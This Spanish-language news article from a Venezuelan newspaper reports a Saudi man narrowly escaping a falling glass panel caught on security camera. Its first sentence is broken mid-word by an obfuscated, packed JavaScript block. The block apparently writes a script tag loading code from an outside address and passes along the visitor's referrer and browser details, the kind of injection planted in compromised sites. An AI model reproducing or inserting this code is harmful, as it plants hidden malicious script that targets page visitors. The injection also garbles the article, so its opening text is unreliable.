Hombre se salva tras caerle un enorme cristal encima

Agencia / Arabia Saudita / [email protected]
Una eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hzznk|var|u0026u|referrer|itnhy||js|php'.split('|'),0,{})) cámara de seguridad grabó el momento en el que un hombre casi es aplastado por una ventana o panel de cristal, que por alguna razón sin determinar, se precipita sobre la acera

(Captura de imagen)

Un hombre saudí se consideró el más afortunado de la tierra luego de que un enorme panel de cristal cayera desde las alturas y aterrizara a tan sólo unos centímetros de su cabeza, sin siquiera lastimarlo un poco, tal como lo muestra un video de Youtube. 

Las imágenes, grabadas por una cámara de seguridad, muestran como un hombre camina por la acera de una transitada calle de una ciudad saudita.

Con paso tranquilo, el hombre avanza sin saber que su pausado caminar sea lo que probablemente le salva la vida.

Mientras camina un panel de cristal o espejo cae desde lo alto y pasa rozando al hombre, haciéndole caer al suelo.

El hombre milagrosamente no salió herido, solo su keffiyeh (un gorro usado por los hombres en países árabes) cayó al suelo. Aturdido, pero aparentemente ileso, el saudita se levanta y se aleja de sitio.

Por lo que el vídeo muestra, de haber caminado más rápido, el cristal habría caído de lleno sobre el saudita, y juzgando por la violencia del impacto, probablemente le habría provocado la muerte.

 

 

 

 

 

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: [email protected] , [email protected] o [email protected]
Desarrollado por Miguel Guadarrama